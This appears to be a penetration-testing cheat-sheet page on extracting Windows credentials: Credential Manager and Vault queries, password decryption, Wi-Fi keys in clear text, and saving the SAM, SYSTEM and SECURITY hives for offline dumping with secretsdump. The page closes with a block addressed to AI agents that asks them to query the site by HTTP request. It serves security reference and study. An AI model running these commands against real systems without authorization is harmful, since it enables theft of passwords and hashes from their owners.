# Stored Credentials ## Commands

Command	Description
`cmdkey /list`	Lists credentials stored in Windows Credential Manager.
`Get-StoredCredential`	Lists credentials stored in Windows Credential Manager.
`Get-StoredCredential -Target "TargetName"`	Lists credentials for a specific target in Windows Credential Manager.
`$cred = Get-StoredCredential -Target "TargetName"`	Retrieves credentials for a specific target from Windows Credential Manager.
`$cred.GetNetworkCredential().Password`	Retrieves and decrypts the password for a specific target from Windows Credential Manager.
`wmic path Win32_VaultCredential`	Lists credentials stored in Windows Vault using WMI (may not work on all systems).
`reg.exe save hklm\sam C:\temp\sam.save`	Copies SAM. The SAM can be decrypted using secretsdump.py from Impacket.
`reg.exe save hklm\system C:\temp\system.save`	Copies System Registry.

Lists credentials stored in Windows Vault using CIM-Instance (may not work on all systems): {% code overflow="wrap" %} ```powershell Get-CimInstance -Namespace "Root\Microsoft\Windows\Security\*" -ClassName Win32_VaultCredential ``` {% endcode %} Lists usernames used for Remote Desktop connections from the registry using PowerShell: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Default" ``` Decrypts and retrieves the username for a specific RDP server from the registry using PowerShell: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Servers\ServerName" -Name "UsernameHint" ``` Lists Wi-Fi network profiles and their passwords using PowerShell (requires admin privileges): {% code overflow="wrap" %} ```powershell (netsh wlan show profiles) | ForEach-Object { $_; (netsh wlan show profile name="$($_.Trim())" key=clear) } ``` {% endcode %} ## LSA Secrets LSA Secrets is used by the Local Security Authority (LSA) as storage, and oftentimes information such as auto-login service accounts or VPN credentials may be stored here: To extract LSA secrets you need SYSTEM privs: ```powershell reg.exe save hklm\security C:\temp\security.save ``` ```powershell reg.exe save hklm\system C:\temp\system.save ``` LSA Secrets is stored within the Security Registry. We still need the Syskey from the System hive so we can decrypt the contents of LSA Secrets. We can then extract the LSA Secrets using secretsdump from Impacket with the command: ```powershell python3 secretsdump.py -security security.save -system system.save LOCAL ``` ## Copy SAM and System Hive To backup the SAM and SYSTEM hashes, we can use the following commands: ```powershell reg save hklm\system C:\Users\backup\system.hive ``` ```powershell reg save hklm\sam C:\Users\backup\sam.hive ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.shellspells.net/windows/system-ops/security/stored-credentials.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.